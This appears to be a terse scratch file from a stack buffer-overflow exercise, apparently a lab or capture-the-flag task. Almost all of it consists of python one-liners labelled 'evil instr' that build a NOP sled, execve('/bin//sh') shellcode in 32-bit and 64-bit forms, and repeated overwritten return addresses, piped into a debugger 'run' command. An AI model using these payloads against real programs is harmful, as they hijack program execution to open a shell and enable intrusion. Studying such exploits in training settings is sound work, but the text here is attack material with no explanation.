0xffffd010
\x10\xd0\xff\xff

evil instr: python -c 'shellcode="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"; print "\x90"*(84 - len(shellcode)) + shellcode + "\x90"*8 +"\x10\xd0\xff\xff"*10'

new ret: 0xbfffd008
\xcc\xee\xff\xbf

"\x90"*(52 - len(shellcode)) + shellcode + "\x90"*40 + "\x08\xd0\xff\xff"*10')

new evil instr: run <<< $(python -c 'shellcode="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"; print "\x90"*(52 - len(shellcode)) + shellcode + "\x90"*40  + "\xcc\xee\xff\xbf"*10')

run <<< $(python -c 'shellcode="\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"; print "\x90"*(84 - len(shellcode)) + shellcode + "\x90"*8 +"\x10\xd0\xff\xff"*10')

